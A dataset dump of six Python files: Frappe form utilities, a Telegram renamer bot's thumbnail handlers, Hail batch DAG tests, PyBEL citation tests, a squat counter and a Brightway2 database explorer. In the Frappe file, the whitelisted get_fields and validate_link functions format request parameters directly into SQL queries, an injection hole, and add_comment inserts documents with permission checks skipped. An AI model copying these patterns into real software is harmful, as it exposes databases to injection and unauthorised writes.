Dataset schema (⌀ marks a nullable column):

| column | dtype | values |
|---|---|---|
| hexsha | string | lengths 40-40 |
| size | int64 | 4 to 1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 4-209 |
| max_stars_repo_name | string | lengths 5-121 |
| max_stars_repo_head_hexsha | string | lengths 40-40 |
| max_stars_repo_licenses | sequence | lengths 1-10 |
| max_stars_count | int64 | 1 to 191k ⌀ |
| max_stars_repo_stars_event_min_datetime | string | lengths 24-24 ⌀ |
| max_stars_repo_stars_event_max_datetime | string | lengths 24-24 ⌀ |
| max_issues_repo_path | string | lengths 4-209 |
| max_issues_repo_name | string | lengths 5-121 |
| max_issues_repo_head_hexsha | string | lengths 40-40 |
| max_issues_repo_licenses | sequence | lengths 1-10 |
| max_issues_count | int64 | 1 to 67k ⌀ |
| max_issues_repo_issues_event_min_datetime | string | lengths 24-24 ⌀ |
| max_issues_repo_issues_event_max_datetime | string | lengths 24-24 ⌀ |
| max_forks_repo_path | string | lengths 4-209 |
| max_forks_repo_name | string | lengths 5-121 |
| max_forks_repo_head_hexsha | string | lengths 40-40 |
| max_forks_repo_licenses | sequence | lengths 1-10 |
| max_forks_count | int64 | 1 to 105k ⌀ |
| max_forks_repo_forks_event_min_datetime | string | lengths 24-24 ⌀ |
| max_forks_repo_forks_event_max_datetime | string | lengths 24-24 ⌀ |
| content | string | lengths 4 to 1.02M |
| avg_line_length | float64 | 1.07 to 66.1k |
| max_line_length | int64 | 4 to 266k |
| alphanum_fraction | float64 | 0.01 to 1 |
39e5c2dae3dc34b172fb5b29d42d8de5ab19cf39 | 4,372 | py | Python | frappe/desk/form/utils.py | Steggur/frappe | be95a19704dd3ac667f7ad64e1694dc5d59856fe | ["MIT"] | null | null | null | frappe/desk/form/utils.py | Steggur/frappe | be95a19704dd3ac667f7ad64e1694dc5d59856fe | ["MIT"] | null | null | null | frappe/desk/form/utils.py | Steggur/frappe | be95a19704dd3ac667f7ad64e1694dc5d59856fe | ["MIT"] | 1 | 2018-03-22T00:24:53.000Z | 2018-03-22T00:24:53.000Z |
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe, json
import frappe.desk.form.meta
import frappe.desk.form.load
from frappe import _
@frappe.whitelist()
def remove_attach():
"""remove attachment"""
import frappe.utils.file_manager
fid = frappe.form_dict.get('fid')
return frappe.utils.file_manager.remove_file(fid)
@frappe.whitelist()
def get_fields():
"""get fields"""
r = {}
args = {
'select':frappe.form_dict.get('select')
,'from':frappe.form_dict.get('from')
,'where':frappe.form_dict.get('where')
}
ret = frappe.db.sql("select %(select)s from `%(from)s` where %(where)s limit 1" % args)
if ret:
fl, i = frappe.form_dict.get('fields').split(','), 0
for f in fl:
r[f], i = ret[0][i], i+1
frappe.response['message']=r
@frappe.whitelist()
def validate_link():
"""validate link when updated by user"""
import frappe
import frappe.utils
value, options, fetch = frappe.form_dict.get('value'), frappe.form_dict.get('options'), frappe.form_dict.get('fetch')
# no options, don't validate
if not options or options=='null' or options=='undefined':
frappe.response['message'] = 'Ok'
return
if frappe.db.sql("select name from `tab%s` where name=%s" % (options, '%s'), (value,)):
# get fetch values
if fetch:
# escape with "`"
fetch = ", ".join(("`{0}`".format(f.strip()) for f in fetch.split(",")))
frappe.response['fetch_values'] = [frappe.utils.parse_val(c) \
for c in frappe.db.sql("select %s from `tab%s` where name=%s" \
% (fetch, options, '%s'), (value,))[0]]
frappe.response['message'] = 'Ok'
@frappe.whitelist()
def add_comment(doc):
"""allow any logged user to post a comment"""
doc = frappe.get_doc(json.loads(doc))
doc.insert(ignore_permissions = True)
return doc.as_dict()
@frappe.whitelist()
def get_next(doctype, value, prev, filters=None, order_by="modified desc"):
import frappe.desk.reportview
prev = not int(prev)
sort_field, sort_order = order_by.split(" ")
if not filters: filters = []
if isinstance(filters, basestring):
filters = json.loads(filters)
# condition based on sort order
condition = ">" if sort_order.lower()=="desc" else "<"
# switch the condition
if prev:
condition = "<" if condition==">" else "<"
else:
sort_order = "asc" if sort_order.lower()=="desc" else "desc"
# add condition for next or prev item
if not order_by[0] in [f[1] for f in filters]:
filters.append([doctype, sort_field, condition, value])
res = frappe.desk.reportview.execute(doctype,
fields = ["name"],
filters = filters,
order_by = sort_field + " " + sort_order,
limit_start=0, limit_page_length=1, as_list=True)
if not res:
frappe.msgprint(_("No further records"))
return None
else:
return res[0][0]
@frappe.whitelist()
def get_linked_docs(doctype, name, metadata_loaded=None, no_metadata=False):
if not metadata_loaded: metadata_loaded = []
meta = frappe.desk.form.meta.get_meta(doctype)
linkinfo = meta.get("__linked_with")
results = {}
if not linkinfo:
return results
me = frappe.db.get_value(doctype, name, ["parenttype", "parent"], as_dict=True)
for dt, link in linkinfo.items():
link["doctype"] = dt
link_meta_bundle = frappe.desk.form.load.get_meta_bundle(dt)
linkmeta = link_meta_bundle[0]
if not linkmeta.get("issingle"):
fields = [d.fieldname for d in linkmeta.get("fields", {"in_list_view":1,
"fieldtype": ["not in", ["Image", "HTML", "Button", "Table"]]})] \
+ ["name", "modified", "docstatus"]
fields = ["`tab{dt}`.`{fn}`".format(dt=dt, fn=sf.strip()) for sf in fields if sf]
try:
if link.get("get_parent"):
if me and me.parent and me.parenttype == dt:
ret = frappe.get_list(doctype=dt, fields=fields,
filters=[[dt, "name", '=', me.parent]])
else:
ret = None
elif link.get("child_doctype"):
ret = frappe.get_list(doctype=dt, fields=fields,
filters=[[link.get('child_doctype'), link.get("fieldname"), '=', name]])
else:
ret = frappe.get_list(doctype=dt, fields=fields,
filters=[[dt, link.get("fieldname"), '=', name]])
except frappe.PermissionError:
continue
if ret:
results[dt] = ret
if not no_metadata and not dt in metadata_loaded:
frappe.local.response.docs.extend(link_meta_bundle)
return results
| 28.763158 | 118 | 0.674062 |
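The helpers above are all exposed with @frappe.whitelist(), so they are reachable over Frappe's /api/method/<dotted.path> REST endpoint. A minimal client-side sketch (illustrative only: the host, credentials and ToDo record name are placeholders, and token-based auth is assumed to be configured):

import requests

# Ask for the record that follows "TODO-0001" in `modified desc` order,
# mirroring what get_next() above does server-side.
response = requests.get(
    "https://example.com/api/method/frappe.desk.form.utils.get_next",
    params={"doctype": "ToDo", "value": "TODO-0001", "prev": 0},
    headers={"Authorization": "token <api_key>:<api_secret>"},  # placeholder credentials
)
print(response.json())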
f256a2a472b2e70ee1c5a55c003a82b8688f94e0 | 3,601 | py | Python | renamer/plugins/thumbnail.py | Anonymous257/TG-RENAMER-BOT | 453eac0fb95e26d5d620a51c5bcb732b88420cd3 | ["Apache-2.0"] | null | null | null | renamer/plugins/thumbnail.py | Anonymous257/TG-RENAMER-BOT | 453eac0fb95e26d5d620a51c5bcb732b88420cd3 | ["Apache-2.0"] | null | null | null | renamer/plugins/thumbnail.py | Anonymous257/TG-RENAMER-BOT | 453eac0fb95e26d5d620a51c5bcb732b88420cd3 | ["Apache-2.0"] | null | null | null |
import logging
logger = logging.getLogger(__name__)
import os
from ..config import Config
from ..tools.text import TEXT
from ..database.database import *
from pyrogram import Client as Filerenamer_X1, filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
################## Saving thumbnail 🖼 ##################
@Filerenamer_X1.on_message(filters.photo & filters.incoming & filters.private)
async def save_photo(c, m):
if Config.BANNED_USERS:
if m.from_user.id in Config.BANNED_USERS:
return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True)
if Config.BOT_PASSWORD:
is_logged = (await get_data(m.from_user.id)).is_logged
if not is_logged and not Config.AUTH_USERS:
return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True)
download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg"
await update_thumb(m.from_user.id, m.message_id)
await m.download(file_name=download_location)
await m.reply_text(
text=TEXT.SAVED_CUSTOM_THUMBNAIL,
quote=True
)
################## Deleting permanent thumbnail 🗑 ##################
@Filerenamer_X1.on_message(filters.command("deletethumbnail") & filters.incoming & filters.private)
async def delete_thumbnail(c, m):
if Config.BANNED_USERS:
if m.from_user.id in Config.BANNED_USERS:
return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True)
if Config.BOT_PASSWORD:
is_logged = (await get_data(m.from_user.id)).is_logged
if not is_logged and not Config.AUTH_USERS:
return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True)
download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg"
thumbnail = (await get_data(m.from_user.id)).thumb_id
if not thumbnail:
text = TEXT.NO_CUSTOM_THUMB_NAIL_FOUND
else:
await update_thumb(m.from_user.id, None)
text = TEXT.DELETED_CUSTOM_THUMBNAIL
try:
os.remove(download_location)
except:
pass
await m.reply_text(
text=text,
quote=True
)
################## Sending permanent thumbnail 🕶 ##################
@Filerenamer_X1.on_message(filters.command("showthumbnail") & filters.incoming & filters.private)
async def show_thumbnail(c, m):
if Config.BANNED_USERS:
if m.from_user.id in Config.BANNED_USERS:
return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True)
if Config.BOT_PASSWORD:
is_logged = (await get_data(m.from_user.id)).is_logged
if not is_logged and not Config.AUTH_USERS:
return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True)
thumbnail = (await get_data(m.from_user.id)).thumb_id
if not thumbnail:
await m.reply_text(
text=TEXT.NO_CUSTOM_THUMB_NAIL_FOUND,
quote=True
)
else:
download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg"
if not os.path.exists(download_location):
thumb_nail = await c.get_messages(m.chat.id, thumbnail)
try:
download_location = await thumb_nail.download(file_name=download_location)
except:
await update_thumb(m.from_user.id, None)
return await m.reply_text(text=TEXT.NO_CUSTOM_THUMB_NAIL_FOUND, quote=True)
await m.reply_photo(
photo=download_location,
caption=TEXT.THUMBNAIL_CAPTION,
parse_mode="markdown",
quote=True
)
################## THE END 🛑 ##################
| 33.342593 | 99 | 0.655374 |
dcd173f9482187dbe13f05d7223011754615ca50 | 9,268 | py | Python | batch/test/test_dag.py | sigmarkarl/hail | 11b7c22342a945c61b24c5f8babf4ab411d3d2f1 | ["MIT"] | null | null | null | batch/test/test_dag.py | sigmarkarl/hail | 11b7c22342a945c61b24c5f8babf4ab411d3d2f1 | ["MIT"] | 2 | 2016-11-17T03:06:10.000Z | 2017-12-05T19:00:24.000Z | batch/test/test_dag.py | sigmarkarl/hail | 11b7c22342a945c61b24c5f8babf4ab411d3d2f1 | ["MIT"] | 2 | 2020-07-28T18:55:19.000Z | 2020-10-19T16:43:03.000Z |
import time
import re
import pytest
from flask import Response
from hailtop.config import get_user_config
from hailtop.batch_client.client import BatchClient, Job
import hailtop.batch_client.aioclient as aioclient
from .utils import batch_status_job_counter, \
legacy_batch_status
from .serverthread import ServerThread
@pytest.fixture
def client():
client = BatchClient('test')
yield client
client.close()
def test_simple(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[head])
batch = batch.submit()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 2, status
assert all([j['exit_code'] == 0 for j in status['jobs']])
def test_missing_parent_is_400(client):
try:
batch = client.create_batch()
fake_job = aioclient.Job.unsubmitted_job(batch._async_builder, 10000)
fake_job = Job.from_async_job(fake_job)
batch.create_job('ubuntu:18.04', command=['echo', 'head'], parents=[fake_job])
batch.submit()
except ValueError as err:
assert re.search('parents with invalid job ids', str(err))
return
assert False
def test_dag(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job('ubuntu:18.04', command=['echo', 'left'], parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[left, right])
batch = batch.submit()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 4, status
for node in [head, left, right, tail]:
status = node.status()
assert status['state'] == 'Success'
assert node._get_exit_code(status, 'main') == 0
def test_cancel_tail(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job('ubuntu:18.04', command=['echo', 'left'], parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job(
'ubuntu:18.04',
command=['/bin/sh', '-c', 'while true; do sleep 86000; done'],
parents=[left, right])
batch = batch.submit()
left.wait()
right.wait()
batch.cancel()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 3, status
for node in [head, left, right]:
status = node.status()
assert status['state'] == 'Success'
assert node._get_exit_code(status, 'main') == 0
assert tail.status()['state'] == 'Cancelled'
def test_cancel_left_after_tail(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job(
'ubuntu:18.04',
command=['/bin/sh', '-c', 'while true; do sleep 86000; done'],
parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[left, right])
batch = batch.submit()
head.wait()
right.wait()
batch.cancel()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 2, status
for node in [head, right]:
status = node.status()
assert status['state'] == 'Success'
assert node._get_exit_code(status, 'main') == 0
for node in [left, tail]:
assert node.status()['state'] == 'Cancelled'
def test_callback(client):
from flask import Flask, request
app = Flask('test-client')
callback_body = []
@app.route('/test', methods=['POST'])
def test():
body = request.get_json()
callback_body.append(body)
return Response(status=200)
try:
server = ServerThread(app)
server.start()
b = client.create_batch(
callback=server.url_for('/test'),
attributes={'foo': 'bar'})
head = b.create_job('alpine:3.8', command=['echo', 'head'])
tail = b.create_job('alpine:3.8', command=['echo', 'tail'], parents=[head])
b = b.submit()
b.wait()
i = 0
while not callback_body:
time.sleep(0.100 * (3/2) ** i)
i += 1
if i > 14:
break
callback_body = callback_body[0]
# verify required fields present
callback_body.pop('cost')
callback_body.pop('msec_mcpu')
callback_body.pop('time_created')
callback_body.pop('time_closed')
callback_body.pop('time_completed')
callback_body.pop('duration')
assert (callback_body == {
'id': b.id,
'billing_project': 'test',
'state': 'success',
'complete': True,
'closed': True,
'n_jobs': 2,
'n_completed': 2,
'n_succeeded': 2,
'n_failed': 0,
'n_cancelled': 0,
'attributes': {'foo': 'bar'}
}), callback_body
finally:
if server:
server.shutdown()
server.join()
def test_no_parents_allowed_in_other_batches(client):
b1 = client.create_batch()
b2 = client.create_batch()
head = b1.create_job('ubuntu:18.04', command=['echo', 'head'])
try:
b2.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[head])
except ValueError as err:
assert re.search('parents from another batch', str(err))
return
assert False
def test_input_dependency(client):
bucket_name = get_user_config().get('batch', 'bucket')
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04',
command=['/bin/sh', '-c', 'echo head1 > /io/data1 ; echo head2 > /io/data2'],
output_files=[('/io/data*', f'gs://{bucket_name}')])
tail = batch.create_job('ubuntu:18.04',
command=['/bin/sh', '-c', 'cat /io/data1 ; cat /io/data2'],
input_files=[(f'gs://{bucket_name}/data*', '/io/')],
parents=[head])
batch.submit()
tail.wait()
assert head._get_exit_code(head.status(), 'main') == 0, head._status
assert tail.log()['main'] == 'head1\nhead2\n', tail.status()
def test_input_dependency_directory(client):
bucket_name = get_user_config().get('batch', 'bucket')
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04',
command=['/bin/sh', '-c', 'mkdir -p /io/test/; echo head1 > /io/test/data1 ; echo head2 > /io/test/data2'],
output_files=[('/io/test/', f'gs://{bucket_name}')])
tail = batch.create_job('ubuntu:18.04',
command=['/bin/sh', '-c', 'cat /io/test/data1; cat /io/test/data2'],
input_files=[(f'gs://{bucket_name}/test', '/io/')],
parents=[head])
batch.submit()
tail.wait()
assert head._get_exit_code(head.status(), 'main') == 0, head._status
assert tail.log()['main'] == 'head1\nhead2\n', tail.status()
def test_always_run_cancel(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job(
'ubuntu:18.04',
command=['/bin/sh', '-c', 'while true; do sleep 86000; done'],
parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job('ubuntu:18.04',
command=['echo', 'tail'],
parents=[left, right],
always_run=True)
batch = batch.submit()
right.wait()
batch.cancel()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 3, status
assert batch_status_job_counter(status, 'Cancelled') == 1, status
for node in [head, right, tail]:
status = node.status()
assert status['state'] == 'Success', status
assert node._get_exit_code(status, 'main') == 0, status
def test_always_run_error(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['/bin/sh', '-c', 'exit 1'])
tail = batch.create_job('ubuntu:18.04',
command=['echo', 'tail'],
parents=[head],
always_run=True)
batch = batch.submit()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Failed') == 1
assert batch_status_job_counter(status, 'Success') == 1
for job, ec, state in [(head, 1, 'Failed'), (tail, 0, 'Success')]:
status = job.status()
assert status['state'] == state, status
assert job._get_exit_code(status, 'main') == ec, status
| 36.924303 | 135 | 0.591282 |
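The tests above double as a reference for the batch DAG API. A condensed sketch of the same diamond-shaped DAG outside the test harness (illustrative: it assumes a reachable Batch deployment and the 'test' billing project used by the fixture):

from hailtop.batch_client.client import BatchClient

client = BatchClient('test')
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job('ubuntu:18.04', command=['echo', 'left'], parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[left, right])
batch = batch.submit()
batch.wait()          # tail only runs after both left and right succeed
client.close()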
6f8e3e23eb5b71660839226903cc28db078b4756 | 8,844 | py | Python | tests/test_manager/test_citation_utils.py | cthoyt/pybel | ed66f013a77f9cbc513892b0dad1025b8f68bb46 | ["Apache-2.0"] | null | null | null | tests/test_manager/test_citation_utils.py | cthoyt/pybel | ed66f013a77f9cbc513892b0dad1025b8f68bb46 | ["Apache-2.0"] | 11 | 2017-12-28T08:03:14.000Z | 2019-01-15T02:13:58.000Z | tests/test_manager/test_citation_utils.py | cthoyt/pybel | ed66f013a77f9cbc513892b0dad1025b8f68bb46 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
"""Test the manager's citation utilities.
The test data can be created with the following script:
.. code-block:: python
import json
from pybel.manager.citation_utils import get_pubmed_citation_response
DATA = {'29324713', '29359844', '9611787', '25818332', '26438529', '26649137', '27003210'}
rv = get_pubmed_citation_response(DATA)
with open('/Users/cthoyt/dev/bel/pybel/tests/test_manager/citation_data.json', 'w') as file:
json.dump(rv, file, indent=2)
"""
import json
import os
import time
import unittest
from typing import Any, Iterable, Mapping
from unittest import mock
from pybel import BELGraph
from pybel.constants import (
CITATION,
CITATION_AUTHORS,
CITATION_DATE,
CITATION_JOURNAL,
CITATION_TYPE_PUBMED,
)
from pybel.dsl import Protein
from pybel.language import CitationDict
from pybel.manager.citation_utils import (
_enrich_citations,
enrich_pubmed_citations,
get_citations_by_pmids,
sanitize_date,
)
from pybel.manager.models import Citation
from pybel.testing.cases import TemporaryCacheMixin
from pybel.testing.utils import n
HERE = os.path.abspath(os.path.dirname(__file__))
PUBMED_DATA_PATH = os.path.join(HERE, "pubmed_citation_data.json")
with open(PUBMED_DATA_PATH) as _file:
PUBMED_DATA = json.load(_file)
PMC_DATA_PATH = os.path.join(HERE, "pmc_citation_data.json")
with open(PMC_DATA_PATH) as _file:
PMC_DATA = json.load(_file)
def _mock_fn(pubmed_identifiers: Iterable[str]) -> Mapping[str, Any]:
result = {
"uids": pubmed_identifiers,
}
for pmid in pubmed_identifiers:
result[pmid] = PUBMED_DATA["result"][pmid]
return {"result": result}
mock_get_pubmed_citation_response = mock.patch(
"pybel.manager.citation_utils.get_pubmed_citation_response",
side_effect=_mock_fn,
)
def _mock_get_pmc_csl_item(pmc_id: str) -> Mapping[str, Any]:
return PMC_DATA[pmc_id]
mock_get_pmc_csl_item = mock.patch(
"pybel.manager.citation_utils.get_pmc_csl_item",
side_effect=_mock_get_pmc_csl_item,
)
class TestSanitizeDate(unittest.TestCase):
"""Test sanitization of dates in various formats."""
def test_sanitize_1(self):
"""Test YYYY Mon DD."""
self.assertEqual("2012-12-19", sanitize_date("2012 Dec 19"))
def test_sanitize_2(self):
"""Test YYYY Mon."""
self.assertEqual("2012-12-01", sanitize_date("2012 Dec"))
def test_sanitize_3(self):
"""Test YYYY."""
self.assertEqual("2012-01-01", sanitize_date("2012"))
def test_sanitize_4(self):
"""Test YYYY Mon-Mon."""
self.assertEqual("2012-10-01", sanitize_date("2012 Oct-Dec"))
def test_sanitize_5(self):
"""Test YYYY Season."""
self.assertEqual("2012-03-01", sanitize_date("2012 Spring"))
def test_sanitize_6(self):
"""Test YYYY Mon DD-DD."""
self.assertEqual("2012-12-12", sanitize_date("2012 Dec 12-15"))
def test_sanitize_7(self):
"""Test YYYY Mon DD-Mon DD."""
self.assertEqual("2005-01-29", sanitize_date("2005 Jan 29-Feb 4"))
def test_sanitize_nope(self):
"""Test failure."""
self.assertEqual(None, sanitize_date("2012 Early Spring"))
class TestPubmed(TemporaryCacheMixin):
"""Tests for citations."""
def setUp(self):
super().setUp()
self.u, self.v = (Protein(n(), n()) for _ in range(2))
self.pmid = "9611787"
self.graph = BELGraph()
self.graph.add_increases(self.u, self.v, citation=self.pmid, evidence=n())
@mock_get_pubmed_citation_response
def test_enrich_pubmed(self, *_):
self.assertEqual(0, self.manager.count_citations())
get_citations_by_pmids(manager=self.manager, pmids=[self.pmid])
self.assertEqual(1, self.manager.count_citations())
c = self.manager.get_citation_by_pmid(self.pmid)
self.assertIsNotNone(c)
self.assertIsInstance(c, Citation)
self.assertEqual(CITATION_TYPE_PUBMED, c.db)
self.assertEqual(self.pmid, c.db_id)
@mock_get_pubmed_citation_response
def test_enrich_pubmed_list(self, *_):
pmids = [
"25818332",
"27003210",
"26438529",
"26649137",
]
get_citations_by_pmids(manager=self.manager, pmids=pmids)
citation = self.manager.get_or_create_citation(namespace=CITATION_TYPE_PUBMED, identifier="25818332")
self.assertIsNotNone(citation)
@mock_get_pubmed_citation_response
def test_enrich_pubmed_list_grouped(self, *_):
pmids = [
"25818332",
"27003210",
"26438529",
"26649137",
]
get_citations_by_pmids(manager=self.manager, pmids=pmids, group_size=2)
citation = self.manager.get_citation_by_pmid("25818332")
self.assertIsNotNone(citation)
@mock_get_pubmed_citation_response
def test_enrich_pubmed_overwrite(self, *_):
citation = self.manager.get_or_create_citation(namespace=CITATION_TYPE_PUBMED, identifier=self.pmid)
self.manager.session.commit()
self.assertIsNone(citation.date)
self.assertIsNone(citation.title)
enrich_pubmed_citations(manager=self.manager, graph=self.graph)
_, _, d = list(self.graph.edges(data=True))[0]
citation_dict = d[CITATION]
self.assertIsInstance(citation_dict, CitationDict)
self.assertIn(CITATION_JOURNAL, citation_dict)
self.assertIn(CITATION_DATE, citation_dict)
self.assertEqual("1998-05-01", citation_dict[CITATION_DATE])
self.assertIn(CITATION_AUTHORS, citation_dict)
self.assertEqual(
{"Lewell XQ", "Judd DB", "Watson SP", "Hann MM"},
set(citation_dict[CITATION_AUTHORS]),
)
@mock_get_pubmed_citation_response
def test_enrich_pubmed_graph(self, *_):
enrich_pubmed_citations(manager=self.manager, graph=self.graph)
_, _, d = list(self.graph.edges(data=True))[0]
citation_dict = d[CITATION]
self.assertIsInstance(citation_dict, CitationDict)
self.assertIn(CITATION_JOURNAL, citation_dict)
self.assertIn(CITATION_DATE, citation_dict)
self.assertEqual("1998-05-01", citation_dict[CITATION_DATE])
self.assertIn(CITATION_AUTHORS, citation_dict)
self.assertEqual(
{"Lewell XQ", "Judd DB", "Watson SP", "Hann MM"},
set(citation_dict[CITATION_AUTHORS]),
)
@mock_get_pubmed_citation_response
@unittest.skipIf(os.environ.get("DB") == "mysql", reason="MySQL collation is wonky")
def test_enrich_pubmed_accent_duplicate(self, *_):
"""Test when two authors, Gomez C and Goméz C are both checked that they are not counted as duplicates."""
g1 = "Gomez C"
g2 = "Gómez C"
pmid_1, pmid_2 = pmids = [
"29324713",
"29359844",
]
get_citations_by_pmids(manager=self.manager, pmids=pmids)
time.sleep(1)
x = self.manager.get_citation_by_pmid(pmid_1)
self.assertIsNotNone(x)
self.assertEqual("Martínez-Guillén JR", x.first.name, msg="wrong first author name")
self.assertIn(g1, self.manager.object_cache_author)
self.assertIn(g2, self.manager.object_cache_author)
a1 = self.manager.get_author_by_name(g1)
self.assertEqual(g1, a1.name)
a2 = self.manager.get_author_by_name(g2)
self.assertEqual(g2, a2.name)
class TestPMC(TemporaryCacheMixin):
"""Tests for citations."""
def setUp(self):
super().setUp()
self.u, self.v = (Protein(n(), n()) for _ in range(2))
self.citation_identifier = "PMC6611653"
self.graph = BELGraph()
self.graph.add_increases(self.u, self.v, citation=("pmc", self.citation_identifier), evidence=n())
@mock_get_pmc_csl_item
def test_enrich_pmc(self, *_):
errors = _enrich_citations(manager=self.manager, graph=self.graph, prefix="pmc")
self.assertEqual(0, len(errors), msg=f"Got errors: {errors}")
_, _, d = list(self.graph.edges(data=True))[0]
citation_dict = d[CITATION]
self.assertIsInstance(citation_dict, CitationDict)
self.assertEqual("pmc", citation_dict.namespace)
self.assertEqual(self.citation_identifier, citation_dict.identifier)
self.assertIn(CITATION_JOURNAL, citation_dict)
self.assertEqual("PLoS computational biology", citation_dict[CITATION_JOURNAL])
self.assertIn(CITATION_DATE, citation_dict)
self.assertEqual("2019-06-24", citation_dict[CITATION_DATE])
self.assertIn(CITATION_AUTHORS, citation_dict)
self.assertLess(0, len(citation_dict[CITATION_AUTHORS]))
        # TODO the eUtils and CSL thing both normalize the way authors look
| 33 | 114 | 0.676278 |
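A small standalone check of the date normalisation exercised by TestSanitizeDate above (runnable with pybel installed; the expected values are taken directly from those tests):

from pybel.manager.citation_utils import sanitize_date

assert sanitize_date("2012 Dec 19") == "2012-12-19"    # YYYY Mon DD
assert sanitize_date("2012 Oct-Dec") == "2012-10-01"   # a month range collapses to its start
assert sanitize_date("2012 Early Spring") is None      # unparseable input
print("sanitize_date OK")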
d50ba0b3f5281f1614b3009b6707bea85f17e078 | 592 | py | Python | sits.py | Peter1-cyber/sits | 218bc3b08adee33af438fc9300d73167a1f0cbeb | ["CC0-1.0"] | null | null | null | sits.py | Peter1-cyber/sits | 218bc3b08adee33af438fc9300d73167a1f0cbeb | ["CC0-1.0"] | null | null | null | sits.py | Peter1-cyber/sits | 218bc3b08adee33af438fc9300d73167a1f0cbeb | ["CC0-1.0"] | null | null | null |
# Module for counting the number of squats
# Your code should go here
from scrollLabel import *
class Sits(ScrollLabel):
def __init__(self, total, **kwargs):
self.total = total
self.current = 0
text = 'Осталось приседаний: ' + str(self.total)
super().__init__(text, **kwargs)
def next(self, *args):
self.current +=1
self.remain = max(0, self.total - self.current)
self.text = 'Осталось приседаний: ' + str(self.remain)
super().set_text(self.text)
| 14.095238 | 63 | 0.560811 |
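Sits subclasses the project's ScrollLabel widget, so it cannot run on its own; the counting logic is just the arithmetic below (a dependency-free sketch with made-up numbers; the label text above, 'Осталось приседаний', means "Squats remaining"):

total, current = 5, 0
for _ in range(3):
    current += 1
    remaining = max(0, total - current)   # same clamping as Sits.next()
    print("Squats remaining:", remaining)
# prints 4, then 3, then 2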
b80a59e936eb4c99d8035f8de23550d979a1fc23 | 1,296 | py | Python | bw2analyzer/explorer.py | aleksandra-kim/brightway2-analyzer-copy | c85961bd2b644458fbeef92e5471ec76d520ab38 | ["BSD-3-Clause"] | null | null | null | bw2analyzer/explorer.py | aleksandra-kim/brightway2-analyzer-copy | c85961bd2b644458fbeef92e5471ec76d520ab38 | ["BSD-3-Clause"] | null | null | null | bw2analyzer/explorer.py | aleksandra-kim/brightway2-analyzer-copy | c85961bd2b644458fbeef92e5471ec76d520ab38 | ["BSD-3-Clause"] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from eight import *
from bw2data import Database, databases
class DatabaseExplorer(object):
def __init__(self, name):
self.db = Database(name)
self.data = self.db.load()
for db in databases[name]["depends"]:
self.data.update(Database(db).load())
def uses_this_process(self, key, recursion=0):
if recursion:
return dict(
[
(k, self.uses_this_process(k, recursion - 1))
for k in self.data
if key in [e["input"] for e in self.data[k].get("exchanges", [])]
]
)
else:
return [
k
for k in self.data
if key in [e["input"] for e in self.data[k].get("exchanges", [])]
]
def provides_this_process(self, key, recursion=0):
if recursion:
return dict(
[
(e["input"], self.provides_this_process(e["input"], recursion - 1))
for e in self.data[key].get("exchanges", [])
]
)
else:
return [(e["input"], ()) for e in self.data[key].get("exchanges", [])]
| 31.609756 | 87 | 0.493056 |
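A usage sketch for DatabaseExplorer above (illustrative: it assumes an activated Brightway2 project that already contains a database named "example_db", the activity key is hypothetical, and the import path follows the file location):

from bw2analyzer.explorer import DatabaseExplorer

explorer = DatabaseExplorer("example_db")        # loads the database plus everything it depends on
key = ("example_db", "some-activity-code")       # hypothetical (database, code) key
consumers = explorer.uses_this_process(key)      # datasets with an exchange whose input is `key`
suppliers = explorer.provides_this_process(key)  # the inputs of `key` itself, as (key, ()) tuples
print(len(consumers), len(suppliers))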
